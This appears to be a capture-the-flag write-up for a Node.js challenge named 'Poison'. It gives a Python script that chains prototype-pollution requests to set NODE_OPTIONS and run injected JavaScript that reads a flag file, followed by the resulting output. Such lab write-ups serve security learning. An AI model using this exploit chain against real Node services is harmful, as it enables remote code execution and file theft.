Poison
Structure
poison
├── src/
│ ├── controllers/
│ ├── date.js
│ └── services.js
│ ├── data/
│ └── services.json
│ ├── middlewares/
│ └── error.js
│ ├── routes/
│ ├── date.json
│ └── services.js
│ └── utils/
│ └── utils.js
│ ├── app.js
│ ├── flag.txt
│ └── package.json
├── .dockerignore
├── Dockerfile
├── entrypoint.sh
└── restart.sh
Solution
Install pip
sudo apt install python3-pipInstall requests
python3 -m pip install requestsExploit
from requests import get, put
host = '127.0.0.1'
port = '8003'
nodeOpt = {
'url': f'http://{host}:{port}/api/tcc/constructor/prototype/NODE_OPTIONS',
'payload': { 'value': '--require /proc/self/environ' }
}
shell = {
'url': f'http://{host}:{port}/api/tcc/constructor/prototype/shell',
'payload': { 'value': 'node' }
}
env = {
'url': f'http://{host}:{port}/api/tcc/constructor/prototype/env',
'payload': { 'value': { 'EXPLOIT': "'';throw new Error(require('fs').readFileSync('/usr/src/app/flag.txt'));//" } }
}
date = {
'url': f'http://{host}:{port}/api/date'
}
put(nodeOpt['url'], json = nodeOpt['payload'])
put(shell['url'], json = shell['payload'])
put(env['url'], json = env['payload'])
response = get(date['url'])
print(response.text)Run the script
python3 exploit.pyOutput
EXPLOIT='';throw new Error(require('fs').readFileSync('/usr/src/app/flag.txt'));//
^
Error: TCC{j5_pR0707yp3_p0150n1Ng}
at Object.<anonymous> (/proc/30/environ:1:18)
at Module._compile (internal/modules/cjs/loader.js:1085:14)
at Object.Module._extensions..js (internal/modules/cjs/loader.js:1114:10)
at Module.load (internal/modules/cjs/loader.js:950:32)
at Function.Module._load (internal/modules/cjs/loader.js:790:12)
at Module.require (internal/modules/cjs/loader.js:974:19)
at Module._preloadModules (internal/modules/cjs/loader.js:1244:12)
at loadPreloadModules (internal/bootstrap/pre_execution.js:475:5)
at prepareMainThreadExecution (internal/bootstrap/pre_execution.js:72:3)
at internal/main/check_syntax.js:24:1Last updated